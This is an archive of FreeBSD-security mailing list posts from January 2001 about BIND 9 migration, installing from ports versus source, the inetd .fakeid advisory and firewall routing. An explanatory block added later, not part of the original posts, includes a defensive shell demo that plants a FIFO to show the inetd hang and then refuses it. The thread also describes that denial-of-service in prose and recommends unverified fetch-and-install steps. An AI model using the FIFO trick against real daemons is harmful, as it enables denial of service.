> > >From: woods@weird.com (Greg A. Woods) > >[ On Monday, January 29, 2001 at 01:36:42 (-0800), Eric A. Hall wrote: ] > > > Subject: Re: sorry to ruin several of your evenings... > > > > > > Somebody asked about an in-place upgrade from BIND 8.x to BIND 9.1.0 > > > (sorry I purged some mails before their time). Just for the sake of > > > readiness, be aware that there are some 8.x options which are unsupported > > > in 9.x. I did an in-place upgrade and had to make a few (mostly > > > insignificant) changes which may be problematic for larger sites. > > > > > > The global config entries I had to remove were: > > > > > > fake-iquery yes > > > multiple-cnames yes > > > rfc2308-type1 yes > > > check-names slave ignore > > > maintain-ixfr-base true > > > >That's just the beginning! :-) > > > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option > >'memstatistics-file' is not yet implemented > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: the default for the > >'auth-nxdomain' option is now 'no' > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option > >'host-statistics' is not yet implemented > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'use-id-pool' is > >obsolete > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'check-names' is > >not implemented > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'os' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'parser' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'load' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'panic' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'packet' ignored > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging > >category 'eventlib' ignored > > > >I don't yet know if "host-statistics" is still necessary to be able to > >see the source of 
an RR in a dump file, or not, but if so then that'll > >be a road-block in keeping me from using 9.1.0 in production. > > > >I'm also very partial to 'check-names'. I've been happy using the > >following in many locations: > > > > check-names master fail; > > check-names slave fail; > > check-names response fail; > > > > > >Even more critically the old 'ndc' program has been replaced by 'rndc', > >which won't work until you've configured it (/etc/rndc.conf) *and* you > >add "controls" statements to your /etc/named.conf to allow it to > >connect, authenticate, and send commands. There doesn't seem to be a > >default way of setting it up for local-only control. I haven't done > >this yet > > > >Even worse than that the new BIND-9 'named' not only doesn't handle > >signals in the same way as previous versions, but it shuts down instead > >of ignoring SIGINT (which used to generate a dump file, which is why > >I've not yet successfully generated and viewed a dump file to see if the > >source of the RR is recorded in there!). So: > > > > > >WARNING: Anyone with scripts or other programs that use signals > >(i.e. kill(1), or kill(2)) to control their named process will almost > >certainly have to re-code to work with BIND-9 (and use 'rndc' and/or its > >mechanisms)! > > > > > >You'll also find that the new named-checkconf fails if you use: > > > > options { > > directory "/etc/namedb"; > > }; > > > >and then try to do something like: > > > > include "named-rfc1918.conf"; > > include "named-slave.conf"; > > include "named-master.conf"; > > > >However the named process itself does seem to do the > >chdir("/etc/namedb") before trying to do the "include"s, > >and if you start named-checkconf from within the right > >directory it'll work.... 
> > -------------------------------------------------------------------- > Mike Tancsa, tel +1 519 651 3400 > Network Administration, mike@sentex.net > Sentex Communications www.sentex.net > Cambridge, Ontario Canada www.sentex.net/mike > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Marius Strom Professional Geek/Unix System Administrator URL: http://www.marius.org/ http://www.marius.org/marius.pgp 0x55DE53E4 "Never underestimate the bandwidth of a mini-van full of DLT tapes traveling down the highway at 65 miles per hour..." -Andrew Tanenbaum, "Computer Networks" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 20:47:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id A58F937B402 for ; Mon, 29 Jan 2001 20:47:20 -0800 (PST) Received: from fpsn.net (control.fpsn.net [63.224.69.60]) by mail.fpsn.net (8.9.3/8.9.3) with ESMTP id VAA98074; Mon, 29 Jan 2001 21:47:07 -0700 (MST) (envelope-from cfaber@fpsn.net) Message-ID: <3A764723.DCF37DD2@fpsn.net> Date: Mon, 29 Jan 2001 21:46:27 -0700 
From: Colin Faber
Reply-To: cfaber@fpsn.net
Organization: fpsn.net, Inc.
X-Mailer: Mozilla 4.75 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: Marius Strom
Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG
Subject: Re: BIND9 Migration from BIND8 (Was: BIND 8.2.3 upgrade available)
References: <006901c08a45$30d64860$46010a0a@sysadmininc.com> <20010129143300.A38419@xor.obsecurity.org> <4.2.2.20010129175758.03255570@marble.sentex.net> <4.2.2.20010129221351.03331388@marble.sentex.net> <20010129223943.L388@marius.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Thanks.

Marius Strom wrote:
> I've posted the migration text file out of the bind-9.1.0 package at
> http://www.marius.org/~marius/unix/migration should anyone care for
> ISC's full details without downloading the full archive.
>
> On Mon, Jan 29, 2001 at 10:15:28PM -0500, Mike Tancsa wrote:
> > At 06:00 PM 1/29/2001 -0500, Mike Tancsa wrote:
> > >At 05:45 PM 1/29/2001 -0500, Peter Brezny wrote:
> > >>Is there a big reason why anyone would not want to just go ahead and run
> > >>bind 9?
> > >
> > >I don't think all the features are there yet. At least the last time I
> > >looked at it, there were some things unimplemented. Also, the
> > >configuration is not totally compatible. I also found it to be a little
> > >unpredictable when I tried version 9.0.1. Perhaps it's more stable now,
> > >but I personally would wait another month or so for it to shake out.
> >
> >
> > Here is a good summary from the NANOG list by Greg Wood on some of the
> > things missing, and some of the things that are different.
> >
> >
> > >From: woods@weird.com (Greg A. Woods)
> > >[ On Monday, January 29, 2001 at 01:36:42 (-0800), Eric A. Hall wrote: ]
> > > > Subject: Re: sorry to ruin several of your evenings...
> > > >
> > > > Somebody asked about an in-place upgrade from BIND 8.x to BIND 9.1.0
> > > > (sorry I purged some mails before their time). Just for the sake of
> > > > readiness, be aware that there are some 8.x options which are unsupported
> > > > in 9.x. I did an in-place upgrade and had to make a few (mostly
> > > > insignificant) changes which may be problematic for larger sites.
> > > >
> > > > The global config entries I had to remove were:
> > > >
> > > >         fake-iquery yes
> > > >         multiple-cnames yes
> > > >         rfc2308-type1 yes
> > > >         check-names slave ignore
> > > >         maintain-ixfr-base true
> > >
> > >That's just the beginning! :-)
> > >
> > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'memstatistics-file' is not yet implemented
> > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: the default for the 'auth-nxdomain' option is now 'no'
> > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'host-statistics' is not yet implemented
> > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'use-id-pool' is obsolete
> > >Jan 29 13:37:46 proven /usr/pkg/sbin/named[22298]: option 'check-names' is not implemented
> > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging category 'os' ignored
> > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging category 'parser' ignored
> > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging category 'load' ignored
> > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging category 'panic' ignored
> > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging category 'packet' ignored
> > >Jan 29 13:37:47 proven /usr/pkg/sbin/named[22298]: unknown logging category 'eventlib' ignored
> > >
> > >I don't yet know if "host-statistics" is still necessary to be able to
> > >see the source of an RR in a dump file, or not, but if so then that'll
> > >be a road-block in keeping me from using 9.1.0 in production.
> > >
> > >I'm also very partial to 'check-names'. I've been happy using the
> > >following in many locations:
> > >
> > >        check-names master fail;
> > >        check-names slave fail;
> > >        check-names response fail;
> > >
> > >
> > >Even more critically the old 'ndc' program has been replaced by 'rndc',
> > >which won't work until you've configured it (/etc/rndc.conf) *and* you
> > >add "controls" statements to your /etc/named.conf to allow it to
> > >connect, authenticate, and send commands. There doesn't seem to be a
> > >default way of setting it up for local-only control. I haven't done
> > >this yet
> > >
> > >Even worse than that the new BIND-9 'named' not only doesn't handle
> > >signals in the same way as previous versions, but it shuts down instead
> > >of ignoring SIGINT (which used to generate a dump file, which is why
> > >I've not yet successfully generated and viewed a dump file to see if the
> > >source of the RR is recorded in there!). So:
> > >
> > >
> > >WARNING: Anyone with scripts or other programs that use signals
> > >(i.e. kill(1), or kill(2)) to control their named process will almost
> > >certainly have to re-code to work with BIND-9 (and use 'rndc' and/or its
> > >mechanisms)!
> > >
> > >
> > >You'll also find that the new named-checkconf fails if you use:
> > >
> > >        options {
> > >                directory "/etc/namedb";
> > >        };
> > >
> > >and then try to do something like:
> > >
> > >        include "named-rfc1918.conf";
> > >        include "named-slave.conf";
> > >        include "named-master.conf";
> > >
> > >However the named process itself does seem to do the
> > >chdir("/etc/namedb") before trying to do the "include"s,
> > >and if you start named-checkconf from within the right
> > >directory it'll work....
> > > >
> > > > --------------------------------------------------------------------
> > Mike Tancsa, tel +1 519 651 3400
> > Network Administration, mike@sentex.net
> > Sentex Communications www.sentex.net
> > Cambridge, Ontario Canada www.sentex.net/mike
> >
> >
> >
> >
> >
> --
> Marius Strom
> Professional Geek/Unix System Administrator
> URL: http://www.marius.org/
> http://www.marius.org/marius.pgp 0x55DE53E4
>
> "Never underestimate the bandwidth of a mini-van full of DLT
> tapes traveling down the highway at 65 miles per hour..."
>         -Andrew Tanenbaum, "Computer Networks"
>

From owner-freebsd-security  Mon Jan 29 20:49:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from marius.org (marius.org [216.88.115.170]) by hub.freebsd.org (Postfix) with ESMTP id 3C30537B402 for ; Mon, 29 Jan 2001 20:48:53 -0800 (PST)
Received: (from marius@localhost) by marius.org (8.11.0/8.11.0) id f0U4moX15272; Mon, 29 Jan 2001 22:48:50 -0600 (CST)
Date: Mon, 29 Jan 2001 22:48:50 -0600
From: Marius Strom
To: Richard Ward
Cc: freebsd-security@freebsd.org
Subject: Re: BIND 9.1 woes
Message-ID: <20010129224850.M388@marius.org>
Mail-Followup-To: Richard Ward , freebsd-security@freebsd.org
References: <00c901c08a66$5f1ce3c0$0101a8c0@pavilion>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <00c901c08a66$5f1ce3c0$0101a8c0@pavilion>; from mh@neonsky.net on Mon, Jan 29, 2001 at 09:43:03PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

According to bind-9.1.0/README:

    On FreeBSD systems, the server logs error messages like
    "fcntl(8, F_SETFL, 4): Inappropriate ioctl for device". This is
    due to a bug in the FreeBSD /dev/random device. The bug has been
    reported to the FreeBSD maintainers. Versions of OpenBSD prior
    to 2.8 have a similar problem.

As far as your -g question, it seems -g support has been deprecated,
although I can't find any confirmation of this in BIND9 docs. The new
functionality of -g is to (according to the new manpage):

    -g      run named in the foreground and force all logging to stderr.

On Mon, Jan 29, 2001 at 09:43:03PM -0500, Richard Ward wrote:
> I just downloaded the BIND 9.1 tarball after hearing about the chaos
> with previous versions. I did run into something odd that I can't quite
> figure out; it's also mentioned in the 9.1 documentation and I'm sure
> someone knows the answer. I managed to start BIND fine, yet digging
> through the logs I ran into this line that makes me wonder.
>
> entropy.c:948: unexpected error:
> fcntl(8, F_SETFL, 4): Inappropriate ioctl for device
>
> Could someone shed light on this "problem"? Also, when trying to start
> BIND 9.1, it will start fine as 'named -g', though when I try to
> 'named -u bind -g bind' (so it runs as that user/group) it doesn't
> launch to the background, and fails to start, period. Any ideas?
> (Sorry for all the questions, I just moved from 8.X and am still
> getting used to the changes/features)
>
> Thanks.
> Richard Ward
> mh@maKintosh.com
>

--
Marius Strom
Professional Geek/Unix System Administrator
URL: http://www.marius.org/
http://www.marius.org/marius.pgp 0x55DE53E4

"Never underestimate the bandwidth of a mini-van full of DLT
tapes traveling down the highway at 65 miles per hour..."
        -Andrew Tanenbaum, "Computer Networks"

From owner-freebsd-security  Mon Jan 29 21:32:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id B212737B400 for ; Mon, 29 Jan 2001 21:32:18 -0800 (PST)
Received: from localhost (marquis@localhost) by roble.com with ESMTP id f0U5WIb01177 for ; Mon, 29 Jan 2001 21:32:18 -0800 (PST)
Date: Mon, 29 Jan 2001 21:32:18 -0800 (PST)
From: Roger Marquis
To: security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Mehmet Hinc wrote:
> Stop in /usr/ports/net/bind8.
> *** Error code 1
>
> What ??????????? Why??????????? I updated my ports and tried to install
> bind8.2.3 because bind8.2.2 has had a vulnerability, so while I was
> installing it, I had an error msg. (in the up)
> please let me know how can I fix it !!!

Bind was written on BSD. What's the point of using a port to
upgrade it? All FreeBSD's bind port does is increase your chances
of errors, reduce your system's overall QA, and install duplicate
files in non-standard places. The following steps have worked
flawlessly over this and several bind upgrades:

  cd /tmp
  fetch ftp.isc.org/isc/bind/src/8.2.3/bind-src.tar.gz
  tar xzvf bind-src.tar.gz
  cd src
  make install
  killall named
  named
  ps auxww | grep named
  cd /tmp
  rm -rf src bind-src.tar.gz

--
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security  Mon Jan 29 21:46:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id 2A34F37B400 for ; Mon, 29 Jan 2001 21:46:04 -0800 (PST)
Received: by elvis.mu.org (Postfix, from userid 1098) id 4622D2B5C4; Mon, 29 Jan 2001 23:46:03 -0600 (CST)
Date: Mon, 29 Jan 2001 23:46:03 -0600
From: Bill Fumerola
To: Roger Marquis
Cc: security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem
Message-ID: <20010129234603.U57121@elvis.mu.org>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from marquis@roble.com on Mon, Jan 29, 2001 at 09:32:18PM -0800
X-Operating-System: FreeBSD 4.2-FEARSOME-20001103 i386
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote:
> Bind was written on BSD. What's the point of using a port to
> upgrade it? All FreeBSD's bind port does is increase your chances
> of errors, reduce your system's overall QA, and install duplicate
> files in non-standard places. The following steps have worked
> flawlessly over this and several bind upgrades:

You seem to have missed a major benefit of (the possibly confusingly
named) ports system:

How do you uninstall all the files it just installed in your method?
How do you know what version is currently installed?

The ports tree is more than just "ported software"; it's a package
management system.

--
Bill Fumerola - security yahoo / Yahoo! inc.
              - fumerola@yahoo-inc.com / billf@FreeBSD.org

From owner-freebsd-security  Mon Jan 29 21:52:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id F18E437B402 for ; Mon, 29 Jan 2001 21:52:11 -0800 (PST)
Received: by obsecurity.org (Postfix, from userid 1000) id ADE59BA134; Mon, 29 Jan 2001 21:52:41 -0800 (PST)
Date: Mon, 29 Jan 2001 21:52:41 -0800
From: Kris Kennaway
To: Roger Marquis
Cc: security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem
Message-ID: <20010129215241.A67997@xor.obsecurity.org>
References:
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="W/nzBZO5zC0uMSeA"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from marquis@roble.com on Mon, Jan 29, 2001 at 09:32:18PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Jan 29, 2001 at 09:32:18PM -0800, Roger Marquis wrote:
> Mehmet Hinc wrote:
> > Stop in /usr/ports/net/bind8.
> > *** Error code 1
> >
> > What ??????????? Why??????????? I updated my ports and tried to install
> > bind8.2.3 because bind8.2.2 has had a vulnerability, so while I was
> > installing it, I had an error msg. (in the up)
> > please let me know how can I fix it !!!
>
> Bind was written on BSD. What's the point of using a port to
> upgrade it? All FreeBSD's bind port does is increase your chances
> of errors, reduce your system's overall QA, and install duplicate
> files in non-standard places. The following steps have worked
> flawlessly over this and several bind upgrades:

Surely that's the description of what your version does, not the port,
which is an official, reversible, tested, vetted way to install the
software on FreeBSD.

In other words, when you compile software yourself you "void the
warranty" and take your life into your own hands :-)

Kris

From owner-freebsd-security  Mon Jan 29 21:55:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id 443C237B400 for ; Mon, 29 Jan 2001 21:55:36 -0800 (PST)
Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id AAA30035; Tue, 30 Jan 2001 00:55:11 -0500
Date: Tue, 30 Jan 2001 00:55:10 -0500 (EST)
From: Mikhail Kruk
To: Kris Kennaway
Cc: Roger Marquis ,
Subject: Re: bind8.2.3 and installation problem
In-Reply-To: <20010129215241.A67997@xor.obsecurity.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> In other words, when you compile software yourself you "void the
> warranty" and take your life into your own hands :-)

Oh, so there is a warranty after all? I knew /COPYRIGHT was a joke! ;)

>
> Kris

From owner-freebsd-security  Mon Jan 29 22:00:09 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 0806637B404 for ; Mon, 29 Jan 2001 21:59:49 -0800 (PST)
Received: by obsecurity.org (Postfix, from userid 1000) id EDA57BA134; Mon, 29 Jan 2001 22:00:18 -0800 (PST)
Date: Mon, 29 Jan 2001 22:00:18 -0800
From: Kris Kennaway
To: Mikhail Kruk
Cc: Roger Marquis , security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem
Message-ID: <20010129220018.B74106@xor.obsecurity.org>
References: <20010129215241.A67997@xor.obsecurity.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="AqsLC8rIMeq19msA"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from meshko@cs.brandeis.edu on Tue, Jan 30, 2001 at 12:55:10AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Jan 30, 2001 at 12:55:10AM -0500, Mikhail Kruk wrote:
> > In other words, when you compile software yourself you "void the
> > warranty" and take your life into your own hands :-)
>
> Oh, so there is a warranty after all? I knew /COPYRIGHT was a joke! ;)

Well, no, but it's still more of a warranty than you get doing it on
your own :-)

Kris

From owner-freebsd-security  Mon Jan 29 22:11:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id B4A9A37B698 for ; Mon, 29 Jan 2001 22:10:39 -0800 (PST)
Received: from localhost (7h1k9s@localhost [127.0.0.1]) by green.dyndns.org (8.11.1/8.11.1) with ESMTP id f0U69Cf70017 for ; Tue, 30 Jan 2001 01:09:48 -0500 (EST) (envelope-from green@FreeBSD.org)
Message-Id: <200101300609.f0U69Cf70017@green.dyndns.org>
X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4
X-Exmh-Isig-CompType: repl
X-Exmh-Isig-Folder: security
To: security@FreeBSD.org
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd [REVISED]
In-Reply-To: Message from FreeBSD Security Advisories of "Mon, 29 Jan 2001 13:06:31 PST." <20010129210631.015E137B698@hub.freebsd.org>
From: "Brian F. Feldman"
Mime-Version: 1.0
Content-Type: text/plain
Date: Tue, 30 Jan 2001 01:09:11 -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Actually, there were two issues. One was that the permissions weren't
dropped totally on the way to opening the .fakeid file, and the other was
that it was not read in a way that would be guaranteed not to block, so by
creating a named pipe, the user could hang an inetd child. I don't
remember which was reported and which I discovered as a result of fixing
the other, BTW. The advisory really should incorporate at least both
issues...

From owner-freebsd-security  Mon Jan 29 22:28:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 3B66A37B402; Mon, 29 Jan 2001 22:28:35 -0800 (PST)
Received: by obsecurity.org (Postfix, from userid 1000) id B7E8FBA134; Mon, 29 Jan 2001 22:29:04 -0800 (PST)
Date: Mon, 29 Jan 2001 22:29:03 -0800
From: Kris Kennaway
To: "Brian F. Feldman"
Cc: security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd [REVISED]
Message-ID: <20010129222903.A79869@xor.obsecurity.org>
References: <200101300609.f0U69Cf70017@green.dyndns.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NzB8fVQJ5HfG6fxh"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200101300609.f0U69Cf70017@green.dyndns.org>; from green@FreeBSD.ORG on Tue, Jan 30, 2001 at 01:09:11AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Jan 30, 2001 at 01:09:11AM -0500, Brian F. Feldman wrote:
> Actually, there were two issues. One was that the permissions weren't
> dropped totally on the way to opening the .fakeid file, and the other was
> that it was not read in a way that would be guaranteed not to block, so by
> creating a named pipe, the user could hang an inetd child.

Is that really a security issue, though?

Kris

From owner-freebsd-security  Mon Jan 29 22:46:51 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id B65F437B400 for ; Mon, 29 Jan 2001 22:46:32 -0800 (PST)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Mon, 29 Jan 2001 22:44:11 -0800
Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0U6jsP02016; Mon, 29 Jan 2001 22:45:54 -0800 (PST) (envelope-from cjc)
Date: Mon, 29 Jan 2001 22:45:48 -0800
From: "Crist J. Clark"
To: mharding@marketnews.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: My FreeBSD Firewall
Message-ID: <20010129224547.E91447@rfx-216-196-73-168.users.reflex>
Reply-To: cjclark@alum.mit.edu
References: <980823114.3a762c4a041fa@mail.marketnews.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <980823114.3a762c4a041fa@mail.marketnews.com>; from mharding@marketnews.com on Mon, Jan 29, 2001 at 09:51:54PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Jan 29, 2001 at 09:51:54PM -0500, mharding@marketnews.com wrote:
> Hello. I am building a Firewall and have some questions about how to implement
> it. The basic firewall is a FreeBSD box running squid for transparent proxy,
> IPFW for dummynet to rate limit syn's, and IPF as my main stateful packet
> filter. The problem I have is with putting this into production. I have a T1
> to the internet, the router's IP address is 172.16.1.1 (well not really but it
> works for the example) and all of the computers on the LAN are in the 172.16.1.0
> (once again..only for the example) network. So here I get to the
> question....is there any way to set the firewall with the same IP address as
> the router to make the install fairly transparent to the users? Could I set
> the firewall up as 172.16.1.1 and use NAT to let it communicate with the router
> for internet traffic? How would I set up my routing tables? Also if anyone
> has any input as far as how I am building my firewall that would be very
> appreciated.

Easy. Put an RFC1918 LAN in between the router and firewall,

                                                               {
  Router:192.168.100.1---192.168.100.2:Firewall:172.16.1.1---{ 172.16.1.0/xx
                                                               {

Just change the internal address of the router and add the route (in
route(8) syntax),

  route add -net 172.16.1.0/xx 192.168.100.2

No need for NAT or anything wack like that.
--
Crist J. Clark                                cjclark@alum.mit.edu

From owner-freebsd-security  Mon Jan 29 22:52:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 367BC37B402; Mon, 29 Jan 2001 22:51:59 -0800 (PST)
Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0U6pvq16959; Mon, 29 Jan 2001 22:51:57 -0800 (PST)
Date: Mon, 29 Jan 2001 22:51:57 -0800
From: Alfred Perlstein
To: Kris Kennaway
Cc: "Brian F. Feldman" , security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd [REVISED]
Message-ID: <20010129225157.O26076@fw.wintelcom.net>
References: <200101300609.f0U69Cf70017@green.dyndns.org> <20010129222903.A79869@xor.obsecurity.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010129222903.A79869@xor.obsecurity.org>; from kris@obsecurity.org on Mon, Jan 29, 2001 at 10:29:03PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

* Kris Kennaway [010129 22:28] wrote:
> On Tue, Jan 30, 2001 at 01:09:11AM -0500, Brian F. Feldman wrote:
> > Actually, there were two issues. One was that the permissions weren't
> > dropped totally on the way to opening the .fakeid file, and the other was
> > that it was not read in a way that would be guaranteed not to block, so by
> > creating a named pipe, the user could hang an inetd child.
>
> Is that really a security issue, though?

Just a guess, one could slowly eat away at all available process slots.

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."
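The two inetd problems discussed in this thread, a user-controlled file that is opened before privileges are fully dropped and a read that can block forever on a named pipe, reduce to one defensive habit: validate what you are about to open, and bound how much you are willing to read from it. The shell function below is an added illustration written for this archive; it is not inetd's code and not anything the posters supplied. It builds a constructed scratch directory holding an honest `.fakeid` beside a FIFO planted under the same name, and refuses the FIFO instead of hanging on it. The name `read_fakeid`, the cap `MAX_FAKEID_BYTES` and the directory layout are assumptions made for the example.

```shell
#!/bin/sh
# Added example for the inetd .fakeid discussion (constructed; not inetd's
# code). A daemon that reads a file the user controls must not trust the
# path: a FIFO left there blocks the reader until a writer shows up, which
# is the hang described in the thread.

MAX_FAKEID_BYTES=256   # hypothetical cap on how much of the file is read

# read_fakeid PATH
# Prints the first line of PATH when it is safe to read; otherwise prints a
# reason to stderr and returns 1 without ever opening the file.
read_fakeid() {
    f=$1
    # Refuse symlinks first: a link can point at a FIFO, a device, or a file
    # the user is not supposed to expose through this mechanism.
    if [ -L "$f" ]; then
        echo "refusing symlink: $f" >&2
        return 1
    fi
    # -p is true for a named pipe; open(2) on it for reading blocks until a
    # writer appears, so it is never opened here.
    if [ -p "$f" ]; then
        echo "refusing FIFO: $f" >&2
        return 1
    fi
    # Anything else that is not a plain regular file (directory, socket,
    # device node) is refused as well.
    if [ ! -f "$f" ]; then
        echo "not a regular file: $f" >&2
        return 1
    fi
    # Bound the read so a huge file cannot keep the child busy either.
    head -c "$MAX_FAKEID_BYTES" "$f" | head -n 1
}

# make_demo_dir
# Builds a constructed scratch tree: honest/.fakeid is a regular file and
# hostile/.fakeid is a FIFO planted under the same name. Prints the path.
make_demo_dir() {
    d=$(mktemp -d)
    mkdir "$d/honest" "$d/hostile"
    printf 'alice\n' > "$d/honest/.fakeid"
    mkfifo "$d/hostile/.fakeid"
    echo "$d"
}

# Stand-alone demonstration.
demo=$(make_demo_dir)
read_fakeid "$demo/honest/.fakeid"                       # prints: alice
read_fakeid "$demo/hostile/.fakeid" || echo "hostile .fakeid refused"
rm -rf "$demo"
```

The test-then-read sequence still leaves a window between the checks and the open. A daemon written in C closes it by opening with `O_NONBLOCK` and `O_NOFOLLOW`, inspecting the descriptor with `fstat(2)`, and doing all of that only after switching to the user's uid and gid, which is the permission drop named as the first issue above. Per-user process limits (`ulimit -u`, or the login class) are what stop a wedged child from consuming every process slot, the follow-up concern raised in the last message.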
From owner-freebsd-security  Mon Jan 29 22:59:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id E322137B503 for ; Mon, 29 Jan 2001 22:59:11 -0800 (PST)
